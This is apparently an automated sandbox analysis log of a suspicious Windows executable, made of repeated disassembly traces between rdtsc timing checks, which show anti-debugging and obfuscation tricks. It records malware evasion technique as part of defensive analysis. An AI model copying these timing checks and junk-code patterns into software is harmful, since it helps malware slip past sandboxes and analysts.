Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D325 second address: C2D347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007FC19D472F31h 0x0000000e jc 00007FC19D472F26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D757 second address: C2D764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC19CEC1DC6h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F2F2 second address: C2F2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F2F6 second address: C2F311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F311 second address: C2F354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1D53h], esi 0x00000012 push 00000000h 0x00000014 jmp 00007FC19D472F35h 0x00000019 push 70E0AA80h 0x0000001e push ecx 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F464 second address: C2F471 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F471 second address: C2F512 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 or dword ptr [ebp+122D2390h], edi 0x0000000e push 00000000h 0x00000010 mov dx, BC32h 0x00000014 add ecx, dword ptr [ebp+122D2B6Dh] 0x0000001a push 7639F834h 0x0000001f jmp 00007FC19D472F39h 0x00000024 xor dword ptr [esp], 7639F8B4h 0x0000002b jmp 00007FC19D472F31h 0x00000030 push 00000003h 0x00000032 mov edx, 20ECB9F4h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FC19D472F28h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D26AEh], ecx 0x00000059 push 00000003h 0x0000005b jp 00007FC19D472F2Ch 0x00000061 add dword ptr [ebp+122D1D53h], ecx 0x00000067 adc edx, 1BB818FCh 0x0000006d push 6CB01D09h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F512 second address: C2F516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F516 second address: C2F51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F60F second address: C2F682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 ja 00007FC19CEC1DE4h 0x0000000d nop 0x0000000e movsx ecx, ax 0x00000011 mov edi, eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FC19CEC1DC8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add edx, 3243D214h 0x00000035 jmp 00007FC19CEC1DD3h 0x0000003a mov cl, E4h 0x0000003c push 8AAA1A25h 0x00000041 pushad 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F682 second address: C2F703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007FC19D472F28h 0x0000000b popad 0x0000000c add dword ptr [esp], 7555E65Bh 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FC19D472F28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ecx, 57C3CC29h 0x00000032 push 00000003h 0x00000034 push ebx 0x00000035 mov di, 23AAh 0x00000039 pop ecx 0x0000003a push 00000000h 0x0000003c mov esi, dword ptr [ebp+122D2C55h] 0x00000042 push 00000003h 0x00000044 mov dword ptr [ebp+122D2255h], edi 0x0000004a push 859BDDEEh 0x0000004f jmp 00007FC19D472F33h 0x00000054 add dword ptr [esp], 3A642212h 0x0000005b lea ebx, dword ptr [ebp+124451DFh] 0x00000061 mov dl, FAh 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2F703 second address: C2F709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C27BFF second address: C27C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C27C03 second address: C27C09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C27C09 second address: C27C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FC19D472F3Ah 0x0000000d jmp 00007FC19D472F2Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C27C26 second address: C27C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DD0h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007FC19CEC1DC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F03A second address: C4F03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F03E second address: C4F042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F042 second address: C4F065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC19D472F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC19D472F37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F493 second address: C4F4A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC19CEC1DC8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F4A7 second address: C4F4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F754 second address: C4F75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F75E second address: C4F776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4F776 second address: C4F792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC19CEC1DCEh 0x0000000d jbe 00007FC19CEC1DC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FA45 second address: C4FA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC19D472F31h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FF93 second address: C4FFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC19CEC1DCEh 0x0000000a jg 00007FC19CEC1DC6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FC19CEC1DC6h 0x0000001a jmp 00007FC19CEC1DCFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FFBC second address: C4FFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FFC0 second address: C4FFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FC19CEC1DCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50277 second address: C50281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508BF second address: C508D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508D9 second address: C508E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508E4 second address: C508EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508EB second address: C50906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC19D472F2Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e ja 00007FC19D472F26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50A35 second address: C50A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FC19CEC1DC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FC19CEC1DC6h 0x00000013 jmp 00007FC19CEC1DCDh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007FC19CEC1DCEh 0x00000021 jg 00007FC19CEC1DC8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50C3A second address: C50C40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50C40 second address: C50C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC19CEC1DCFh 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50C59 second address: C50C75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F37h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C51053 second address: C51057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C51057 second address: C5105B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5A472 second address: C5A489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5A489 second address: C5A48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5A48F second address: C5A4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FC19CEC1DCAh 0x0000000d jbe 00007FC19CEC1DDCh 0x00000013 jmp 00007FC19CEC1DD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BC6F second address: C1BCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F35h 0x00000009 pop edi 0x0000000a je 00007FC19D472F34h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BCA3 second address: C1BCAD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC19CEC1DC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BCAD second address: C1BCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BCB9 second address: C1BCC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC19CEC1DC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C16A9C second address: C16AA6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C16AA6 second address: C16AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C16AAC second address: C16AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FC19D472F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FC19D472F26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5F361 second address: C5F37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC19CEC1DD9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C22A3C second address: C22A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E84F second address: C5E853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E853 second address: C5E86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E86E second address: C5E872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E98D second address: C5E997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5F06D second address: C5F08F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC19CEC1DD8h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C60FA4 second address: C60FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C60FAA second address: C60FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FC19CEC1DD8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FC19CEC1DC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C60FC1 second address: C60FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6123B second address: C61256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC19CEC1DD0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61256 second address: C6125A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6125A second address: C61260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C613F7 second address: C613FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61DB9 second address: C61DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61EDE second address: C61EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FC19D472F26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61EEB second address: C61EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61FA5 second address: C61FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62090 second address: C62094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62191 second address: C6219B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6219B second address: C621E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC19CEC1DCDh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC19CEC1DC8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov di, cx 0x0000002d push eax 0x0000002e sub edi, 48945EAFh 0x00000034 pop edi 0x00000035 push eax 0x00000036 jnc 00007FC19CEC1DD4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62603 second address: C62607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62607 second address: C62624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FC19CEC1DCCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FC19CEC1DC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C640C8 second address: C640CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C640CC second address: C64140 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FC19CEC1DC8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, 4CF4EA56h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FC19CEC1DC8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 push 00000000h 0x0000004a jmp 00007FC19CEC1DD6h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jns 00007FC19CEC1DC8h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64140 second address: C6414A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C39 second address: C64C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C3E second address: C64C55 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC19D472F28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FC19D472F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C55 second address: C64C5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C5F second address: C64C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6547D second address: C65490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C65F4B second address: C65F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C66CCB second address: C66CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C676A8 second address: C676BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
